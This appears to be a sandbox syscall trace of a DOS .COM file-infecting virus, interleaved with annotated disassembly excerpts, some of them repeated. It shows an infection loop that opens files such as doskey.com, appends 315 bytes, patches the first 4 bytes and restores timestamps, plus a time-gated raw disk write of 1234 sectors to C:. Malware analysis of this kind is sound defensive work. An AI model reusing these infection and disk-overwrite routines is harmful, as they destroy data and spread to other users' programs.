2018-12-25T11:45:09.11752752Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.119954754Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.122159292Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.126988567Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.130013218Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.132845808Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.134572246Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.198246216Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.201199183Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.248221187Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.256094657Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.257613163Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.26428982Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.26582639Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.268557041Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.2713491Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.273243471Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.277639688Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.279459269Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.353487221Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.35704383Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.367319398Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.374343414Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.376948155Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.38344741Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.385540881Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.388960698Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.397204655Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.398827417Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.406876811Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.408534933Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.416632743Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.419927401Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.429821969Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.437127046Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.439764873Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.447011251Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.448387342Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.450697214Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.454431475Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.456101951Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.459343092Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.461461079Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.473517755Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.477042236Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.487089196Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.494119603Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.495934335Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.498858267Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.500289046Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.502675731Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.511059486Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.512398088Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.51930637Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.521549589Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.529143088Z 79 PC: 12a94 | Find next file (See above)
; Excerpt: time-gated absolute disk write, then the jump back to offset 0x100, followed
; by the start of the routine that clears a file's attributes and opens it read/write.
; NOTE(review): the trace shows no entry between Get time and Set disk transfer address;
; confirm whether the sandbox records int 0x26 at all before concluding the write did not run.
2018-12-25T11:45:09.531617069Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2  ; dl = hundredths of a second returned by Get time
0x12aa4: ja 0x12aaf  ; dl > 2 (unsigned): skip the disk write
0x12aa6: mov al, 2  ; int 0x26 drive number: 2 = C:
0x12aa8: mov cx, 0x4d2  ; sector count: 0x4d2 = 1234
0x12aab: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx (start sector) = sign-extension of ax; ah is not set in this excerpt
0x12aac: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system; buffer ds:bx is not set in this excerpt
0x12aae: popf  ; int 0x26 returns with the flags still on the stack; discard them
0x12aaf: mov dx, 0x80  ; offset 0x80 is the default DTA inside the PSP
0x12ab2: mov ah, 0x1a  ; AH=1Ah: set disk transfer address to ds:dx
0x12ab4: int 0x21  ; trace: "Set disk transfer address" (PC 12ab6)
0x12ab6: mov di, 0x100  ; 0x100 = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret  ; push + ret = jump to offset 0x100, i.e. control passes to the program at the .COM entry
0x12abb: lea dx, word ptr [bp + 0x259]  ; separate routine starts here; dx = bp-relative buffer, presumably the file name - confirm
0x12abf: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12ac2: xor cx, cx  ; new attributes = 0 (clears read-only, hidden and system)
0x12ac4: int 0x21  ; trace: "Get or set file attributes" (PC 12ac6)
0x12ac6: mov ax, 0x3d02  ; AH=3Dh, AL=02h: open for read/write
0x12ac9: int 0x21  ; trace: "Open file" (PC 12acb)
0x12acb: jb 0x12b23  ; carry set = open failed: branch to 0x12b23, outside this excerpt
2018-12-25T11:45:09.534056656Z 26 PC: 12ab6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":2213,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:45:08.940122777Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T11:45:08.941691062Z 67 PC: 12ac6 | Get or set file attributes
2018-12-25T11:45:08.950567196Z 61 PC: 12acb | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T11:45:08.956987309Z 78 PC: 12a94 | Find first file
2018-12-25T11:45:08.985642552Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.00061517Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.016524875Z 87 PC: 12ad3 | Get or set file date and time
2018-12-25T11:45:09.018599855Z 63 PC: 12ae0 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:09.024017832Z 66 PC: 12aef | Move file pointer
; Excerpt: tail of the file-modification routine. It seeks to the start of the open
; file, overwrites the first 4 bytes, sets the file date/time and closes the handle.
; The routine begins before 0x12afa (the je below targets 0x12af6), so its setup is not shown.
2018-12-25T11:45:09.025083906Z 44 PC: 12afa | Get time 0x12afa: add dl, dh  ; Get time returns dh = seconds, dl = hundredths; dl = their sum
0x12afc: je 0x12af6  ; sum is zero: branch back to code outside this excerpt
0x12afe: mov word ptr [bp + 0x10e], bx  ; store bx in a bp-relative variable; presumably the file handle - confirm
0x12b02: call 0x22a50  ; NOTE(review): 16-bit IP wraps, so the real target is presumably 0x12a50; the trace's next entry is the 315-byte write at PC 12a5e
0x12b05: mov ax, 0x4200  ; int 0x21 AH=42h, AL=00h: move file pointer, relative to start of file
0x12b08: sub cx, cx  ; high word of the offset = 0
0x12b0a: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx = sign-extension of ax = 0
0x12b0b: int 0x21  ; trace: "Move file pointer" (PC 12b0d), offset cx:dx = 0
0x12b0d: mov ah, 0x40  ; AH=40h: write to the handle in bx
0x12b0f: mov cx, 4  ; byte count
0x12b12: lea dx, word ptr [bp + 0x233]  ; source buffer; its contents are not shown in the report
0x12b16: int 0x21  ; trace: "Write 4 bytes on handle 5" (PC 12b18) - replaces the file's first 4 bytes
0x12b18: pop dx  ; pushed outside this excerpt; presumably the date read at PC 12ad3 - confirm
0x12b19: pop cx  ; presumably the matching time value
0x12b1a: mov ax, 0x5701  ; AX=5701h: set file date (dx) and time (cx)
0x12b1d: int 0x21  ; if these are the original values, the timestamp will not reveal the change; compare size or hash instead
0x12b1f: mov ah, 0x3e  ; AH=3Eh: close handle
0x12b21: int 0x21  ; trace: "Close file" (PC 12b23)
0x12b23: ret
0x12b24: pop bx  ; follows the ret, so it belongs to the next piece of code
2018-12-25T11:45:09.026577138Z 64 PC: 12a5e | Write file or device (Write 315 bytes on handle 5)
2018-12-25T11:45:09.147065318Z 66 PC: 12b0d | Move file pointer
2018-12-25T11:45:09.14819209Z 64 PC: 12b18 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:45:09.152374366Z 87 PC: 12b1f | Get or set file date and time
2018-12-25T11:45:09.154681749Z 62 PC: 12b23 | Close file
2018-12-25T11:45:09.353673746Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.356464325Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.367484154Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.374423964Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.376337193Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.38441808Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.386084718Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.388544325Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.392587663Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.394294524Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.39717006Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.400204749Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.408034217Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.411044816Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.421930365Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.429028583Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.430856871Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.438283144Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.439741123Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.44185863Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.445627199Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.447444297Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.450505241Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.452389988Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.460605098Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.463535072Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.474152442Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.480535054Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.481794955Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.48784101Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.489222849Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.49124413Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.493802199Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.495884417Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.498608625Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.500228822Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.507645676Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.510127893Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.519386083Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.531476166Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.533443413Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.540369572Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.542571095Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.544753992Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.547473767Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.549391145Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.551853311Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.553228801Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.560728882Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.563262505Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.572522397Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.579732262Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.58100391Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.587168296Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.589942144Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.593187Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.601410523Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.604004208Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.610261283Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.612068443Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.620643891Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.623306261Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.633239255Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.640501935Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.641895219Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.64812206Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.650165585Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.652511266Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.655980462Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.657488171Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.661204121Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.662632789Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.669826642Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.673593224Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.683518656Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.690214246Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.693199591Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.699455187Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.700718485Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.703711218Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.711499907Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.713188768Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.721057443Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.722634529Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.730735441Z 79 PC: 12a94 | Find next file (See above)
; Excerpt: time-gated absolute disk write, then the jump back to offset 0x100, followed
; by the start of the routine that clears a file's attributes and opens it read/write.
; NOTE(review): the trace shows no entry between Get time and Set disk transfer address;
; confirm whether the sandbox records int 0x26 at all before concluding the write did not run.
2018-12-25T11:45:09.734538834Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2  ; dl = hundredths of a second returned by Get time
0x12aa4: ja 0x12aaf  ; dl > 2 (unsigned): skip the disk write
0x12aa6: mov al, 2  ; int 0x26 drive number: 2 = C:
0x12aa8: mov cx, 0x4d2  ; sector count: 0x4d2 = 1234
0x12aab: cdq  ; one-byte opcode in 16-bit code, so effectively CWD: dx (start sector) = sign-extension of ax; ah is not set in this excerpt
0x12aac: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system; buffer ds:bx is not set in this excerpt
0x12aae: popf  ; int 0x26 returns with the flags still on the stack; discard them
0x12aaf: mov dx, 0x80  ; offset 0x80 is the default DTA inside the PSP
0x12ab2: mov ah, 0x1a  ; AH=1Ah: set disk transfer address to ds:dx
0x12ab4: int 0x21  ; trace: "Set disk transfer address" (PC 12ab6)
0x12ab6: mov di, 0x100  ; 0x100 = entry offset of a .COM program
0x12ab9: push di
0x12aba: ret  ; push + ret = jump to offset 0x100, i.e. control passes to the program at the .COM entry
0x12abb: lea dx, word ptr [bp + 0x259]  ; separate routine starts here; dx = bp-relative buffer, presumably the file name - confirm
0x12abf: mov ax, 0x4301  ; AX=4301h: set file attributes
0x12ac2: xor cx, cx  ; new attributes = 0 (clears read-only, hidden and system)
0x12ac4: int 0x21  ; trace: "Get or set file attributes" (PC 12ac6)
0x12ac6: mov ax, 0x3d02  ; AH=3Dh, AL=02h: open for read/write
0x12ac9: int 0x21  ; trace: "Open file" (PC 12acb)
0x12acb: jb 0x12b23  ; carry set = open failed: branch to 0x12b23, outside this excerpt
2018-12-25T11:45:09.737440152Z 26 PC: 12ab6 | Set disk transfer address